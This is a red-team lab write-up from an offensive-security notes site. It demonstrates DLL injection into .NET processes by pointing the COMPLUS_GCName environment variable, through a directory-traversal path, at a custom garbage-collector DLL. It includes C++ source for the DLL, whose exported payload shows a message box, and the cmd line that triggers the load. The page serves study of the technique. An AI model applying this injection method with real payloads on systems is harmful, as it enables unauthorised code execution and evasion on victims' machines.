Red Teaming Experiments
Red Teaming Experiments
linkedin
github
@spotheplanet
patreon
What is this?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
offensive security
Red Team Infrastructure
Initial Access
Code Execution
Code & Process Injection
CreateRemoteThread Shellcode Injection
DLL Injection
Reflective DLL Injection
Shellcode Reflective DLL Injection
Process Doppelganging
Loading and Executing Shellcode From PE Resources
Process Hollowing and Portable Executable Relocations
APC Queue Code Injection
Early Bird APC Queue Code Injection
Shellcode Execution in a Local Process with QueueUserAPC and NtTestAlert
Shellcode Execution through Fibers
Shellcode Execution via CreateThreadpoolWait
Local Shellcode Execution without Windows APIs
Injecting to Remote Process via Thread Hijacking
SetWindowHookEx Code Injection
Finding Kernel32 Base and Function Addresses in Shellcode
Executing Shellcode with Inline Assembly in C/C++
Backdooring PE Files with Shellcode
NtCreateSection + NtMapViewOfSection Code Injection
AddressOfEntryPoint Code Injection without VirtualAllocEx RWX
Module Stomping for Shellcode Injection
PE Injection: Executing PEs inside Remote Processes
API Monitoring and Hooking for Offensive Tooling
Windows API Hooking
Import Adress Table (IAT) Hooking
DLL Injection via a Custom .NET Garbage Collector
Injecting .NET Assembly to an Unmanaged Process
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Lateral Movement
Persistence
Exfiltration
reversing, forensics & misc
Windows Kernel / Internals
Exploring Process Environment Block
ETW: Event Tracing for Windows 101
Parsing PE File Headers with C++
Exploring Injected Threads
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered by GitBook

DLL Injection via a Custom .NET Garbage Collector

This is a quick lab to test a DLL injection technique discovered by @am0nsec, which he describes in his blogpost https://www.contextis.com/us/blog/bring-your-own-.net-core-garbage-collector - go check it out!

The idea behind this technique is that a low privileged user can specify a custom Garbage Collector (GC), that a .NET application should use. A custom GC can be specified by setting a command shell environment variable COMPLUS_GCName, that points to a malicious DLL which represents a custom Garbage Collector.

Normally, specifying a custom GC requires administartor privileges, however, since path to a custom GC in COMPLUS_GCName is not sanitized when a custom GC is loaded, directory traversal allows any unprivileged user to specify a custom GC to be loaded from an arbitrary location to which they can drop their DLL.

The Gargage Collector DLL needs to export GC_VersionInfo method for this technique to work - this is the method that will contain our payload, that will be executed once a .NET program starts and loads our custom GC DLL.

Execution

Let's create a DLL that represents a custom Garbage Collector. It needs to export a function GC_VersionInfo, which in our case executes a simple message box:

#include <Windows.h>
​
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
​
struct VersionInfo
{
    UINT32 MajorVersion;
    UINT32 MinorVersion;
    UINT32 BuildVersion;
    const char* Name;
​
};
​
extern "C" __declspec(dllexport) void GC_VersionInfo(VersionInfo * info)
{
    info->BuildVersion = 0;
    info->MinorVersion = 0;
    info->BuildVersion = 0;
    MessageBoxA(NULL, "Injection", "Injection", 0);
}

Once the DLL is compiled, we can set the COMPLUS_GCName environment variable in our cmd.exe shell and point it to the compiled DLL:

set COMPLUS_GCName=..\..\..\..\..\..\..\..\..\..\..\..\..\labs\GarbageCollector\GC\x64\Release\GC.dll & dotnet.exe -h

We can execute any .NET binary found on the system and it will load our GC.dll. In this lab, we do:

dotnet.exe -h

Below shows that our GC.dll got injected into the dotnet.exe:

References

Previous
Import Adress Table (IAT) Hooking
Next
Injecting .NET Assembly to an Unmanaged Process
Last updated 4 months ago
Contents
Execution
References